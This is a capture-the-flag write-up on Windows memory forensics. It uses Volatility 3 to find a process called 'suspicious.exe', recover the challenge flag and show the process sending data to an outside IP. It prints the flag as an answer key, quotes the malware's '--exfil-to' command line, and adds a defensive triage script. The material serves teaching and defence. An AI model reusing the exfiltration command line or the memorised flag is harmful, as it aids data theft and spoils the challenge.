forensics • SANS Holiday Hack • Jul 18, 2023

Memory Analysis: Extracting Evidence from a Memory Dump

Extracting evidence from a memory dump to recover the flag in a SANS Holiday Hack challenge.

01. Challenge Overview

In this challenge, we were provided with a memory dump from a compromised Windows system. Our task was to analyze the memory dump to identify malicious processes, extract evidence of the attack, and ultimately recover the flag that was hidden within the system's memory.

# Challenge Details
Name: Memory Forensics Challenge
Points: 500
Description: A system was compromised. We've captured a memory dump. Find the flag hidden by the attacker.
File: memory_dump.raw (2.5GB)

02. Tools Used

  • Volatility 3 - Memory forensics framework
  • Wireshark - Network traffic analysis
  • Strings - Extract ASCII and Unicode strings from binary files
  • Python - Custom scripts for data extraction and analysis
$ python3 -m volatility3 -f memory_dump.raw windows.info
Volatility 3 Framework 2.4.1
Progress:  100.00               PDB scanning finished
Variable            Value

Kernel Base         0xf80002a5c000
DTB                 0x1ad000
Symbols             file:///path/to/symbols
Is64Bit             True
IsPAE               False
primary             0 WindowsIntel32e
memory_layer        1 FileLayer
KdVersionBlock      0xf80002c8f0e0
Major/Minor         15.18362
MachineType         34404
KeNumberProcessors  4
SystemTime          2023-07-15 14:32:45

03. Initial Analysis

I began by identifying the running processes at the time of the memory capture. This would give me an overview of the system's state and potentially reveal suspicious processes.

$ python3 -m volatility3 -f memory_dump.raw windows.pslist
PID   PPID  ImageFileName   Offset(V)       Threads  Handles  SessionId  Wow64  CreateTime                  ExitTime
4     0     System          0xfa8001f94040  124      -        N/A        False  2023-07-15 12:03:45.000000  N/A
88    4     Registry        0xfa8002012080  4        -        N/A        False  2023-07-15 12:03:40.000000  N/A
...
3452  1592  suspicious.exe  0xfa8001d65080  6        -        1          False  2023-07-15 14:28:12.000000  N/A
...

I noticed a suspicious process named "suspicious.exe" with PID 3452. This process was started shortly before the memory dump was captured, making it a primary target for investigation.

04. Deep Dive into Suspicious Process

To further investigate the suspicious process, I dumped its memory and analyzed the strings contained within it. I also examined the process's network connections and command history.

$ python3 -m volatility3 -f memory_dump.raw windows.dumpfiles --pid 3452
Cache  File at 0xfa8001d65080 => pid.3452.suspicious.exe.img

$ strings pid.3452.suspicious.exe.img | grep -i flag
FlagStorage
GetFlag
flag_encrypted.bin
FLAG{M3m0ry_F0r3ns1cs_1s_Fun}

By examining the strings in the suspicious process's memory, I was able to find references to flag-related functions and files. Most importantly, I discovered the flag itself: FLAG{M3m0ry_F0r3ns1cs_1s_Fun}.

05. Additional Findings

While the primary objective was to find the flag, I continued my analysis to understand the full scope of the compromise. I examined network connections, registry keys, and command history.

$ python3 -m volatility3 -f memory_dump.raw windows.netscan
Offset    Proto  LocalAddr      LocalPort  RemoteAddr     RemotePort  State        PID   Owner           Created
0x3e72a0  TCPv4  192.168.1.105  49232      93.184.216.34  443         ESTABLISHED  3452  suspicious.exe  N/A
...

$ python3 -m volatility3 -f memory_dump.raw windows.cmdline
PID   Process         Args
...
3452  suspicious.exe  C:\Users\Admin\Downloads\suspicious.exe --encrypt-flag --exfil-to 93.184.216.34

These additional findings revealed that the suspicious process was attempting to encrypt the flag and exfiltrate it to a remote server. This confirmed that it was indeed a malicious process designed to steal sensitive information.
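The correlation done by hand above (a process created minutes before the capture, per pslist, that also holds an established connection to an outside address, per netscan) is easy to script when a dump has hundreds of processes. The following is an added example, not part of the original writeup, that parses the plain-text output of those two Volatility 3 plugins and returns the processes matching both indicators; the sample rows are constructed copies of the output shown above, and the 15-minute window is an assumed default.

```python
from datetime import datetime, timedelta
import ipaddress

# Constructed sample input: the windows.pslist and windows.netscan rows shown above, whitespace-separated.
PSLIST = """\
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xfa8001f94040 124 - N/A False 2023-07-15 12:03:45.000000 N/A
88 4 Registry 0xfa8002012080 4 - N/A False 2023-07-15 12:03:40.000000 N/A
3452 1592 suspicious.exe 0xfa8001d65080 6 - 1 False 2023-07-15 14:28:12.000000 N/A
"""
NETSCAN = """\
Offset Proto LocalAddr LocalPort RemoteAddr RemotePort State PID Owner Created
0x3e72a0 TCPv4 192.168.1.105 49232 93.184.216.34 443 ESTABLISHED 3452 suspicious.exe N/A
"""
SYSTEM_TIME = datetime(2023, 7, 15, 14, 32, 45)  # SystemTime reported by windows.info

def parse_pslist(text):
    """Map PID -> (image name, CreateTime) from windows.pslist output."""
    procs = {}
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10:  # skips '...' and other non-row lines
            continue
        # CreateTime spans two whitespace-separated fields: date and time.
        created = datetime.strptime(f"{f[8]} {f[9]}", "%Y-%m-%d %H:%M:%S.%f")
        procs[int(f[0])] = (f[2], created)
    return procs

def parse_netscan(text):
    """Map PID -> [remote IPs] for ESTABLISHED connections to non-private addresses."""
    external = {}
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9 or f[6] != "ESTABLISHED":
            continue
        remote = ipaddress.ip_address(f[4])
        if not (remote.is_private or remote.is_loopback):
            external.setdefault(int(f[7]), []).append(str(remote))
    return external

def triage(pslist_text, netscan_text, capture_time, window=timedelta(minutes=15)):
    """Processes created within `window` before the capture that also hold an
    external connection, as [(pid, name, minutes_before_capture, [remote IPs])]."""
    hits = []
    external = parse_netscan(netscan_text)
    for pid, (name, created) in parse_pslist(pslist_text).items():
        age = capture_time - created
        if timedelta(0) <= age <= window and pid in external:
            hits.append((pid, name, int(age.total_seconds() // 60), external[pid]))
    return sorted(hits, key=lambda h: h[2])
```

Run against the sample rows, `triage(PSLIST, NETSCAN, SYSTEM_TIME)` returns only PID 3452, created about 4 minutes before the capture with a connection to 93.184.216.34; System and Registry are excluded by both their age and their lack of external connections.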

06. Conclusion

This challenge demonstrated the importance of memory forensics in incident response. By analyzing the memory dump, I was able to:

  • Identify a suspicious process
  • Extract the flag from the process's memory
  • Determine that the process was attempting to exfiltrate the flag to a remote server

The flag was successfully recovered: FLAG{M3m0ry_F0r3ns1cs_1s_Fun}